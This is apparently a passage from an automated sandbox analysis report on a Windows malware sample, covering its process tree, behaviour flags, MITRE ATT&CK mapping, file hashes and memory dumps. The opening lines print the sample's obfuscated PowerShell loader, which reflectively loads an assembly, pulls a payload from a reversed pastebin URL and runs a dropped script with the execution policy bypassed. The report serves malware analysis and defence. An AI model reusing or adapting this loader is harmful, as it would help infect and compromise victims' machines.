;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''Hpu47S1r/war/moc.nibetsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\$RDOOKRE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1736
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:3020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
55d0af8c6379318a52d7b7ce56774b39

SHA1
630439186e7264b5b1597f1204bea27bfda9e300

SHA256
61ba20f12149a5d100bd63ac1b5dc2b43bfd3767c770fa1db29a4ba458b88e53

SHA512
da2f8a20d768f0b079796a21bb4dda145511c5db61d8e821d8fd953dcc1d8a2a94154e648b3dbf7f32499ee7ea1d0cc12553e939a247fc9a71cb5faa75ac159a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bc428e5d56eb8dee328668872473df46

SHA1
8b5c5af348071d6629796cab0546eed15f53ae8f

SHA256
7b0064841b626e129dc31e34349f1d44d36951d6c0b3d59481d411dda74e1b2c

SHA512
a7a73da1738716005069464ce17ea65df7298eee070c9f6f7f9827b944e57e7a919aafe814032b8a967f37c30973341e1edfa8d1fdfbfa887779083ab51c5502

Download Submit
memory/2268-4-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download
memory/2268-5-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2268-6-0x0000000002880000-0x0000000002888000-memory.dmp

Filesize
32KB

Download
memory/2268-7-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-8-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-9-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-15-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-16-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2268-17-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing